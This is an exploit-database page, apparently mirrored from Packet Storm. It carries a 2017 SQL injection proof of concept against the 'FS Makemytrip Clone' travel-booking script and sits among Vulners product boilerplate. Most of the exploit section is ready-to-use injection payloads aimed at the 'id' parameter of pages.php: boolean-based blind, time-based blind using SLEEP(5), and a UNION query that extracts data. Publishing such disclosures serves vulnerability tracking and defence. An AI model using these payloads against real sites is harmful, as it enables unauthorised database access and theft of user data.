Lucene search
K

FS Makemytrip Clone SQL Injection

🗓️ 06 Dec 2017 00:00:00Reported by DanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

FS Makemytrip Clone SQL Injection - 2017-12-05, DanAde

Code
`# Exploit Title: FS Makemytrip Clone - SQL Injection  
# Date: 2017-12-05  
# Exploit Author: DanAdeg  
# Vendor Homepage: https://fortunescripts.com/  
# Software Link: https://fortunescripts.com/product/makemytrip-clone/  
# Version: 2017-12-05  
# Tested on: Kali Linux 2.0  
  
(PoC):  
SQL Injection on GET parameter = id  
http://localhost/pages.php?id=  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=1 AND 2990=2990  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: id=1 OR SLEEP(5)  
Type: UNION query  
Title: Generic UNION query (NULL) - 4 columns  
Payload: id=-4648 UNION ALL SELECT  
NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL--  
YbYU  
---  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Dec 2017 00:00Current
0.6Low risk
Vulners AI Score0.6
50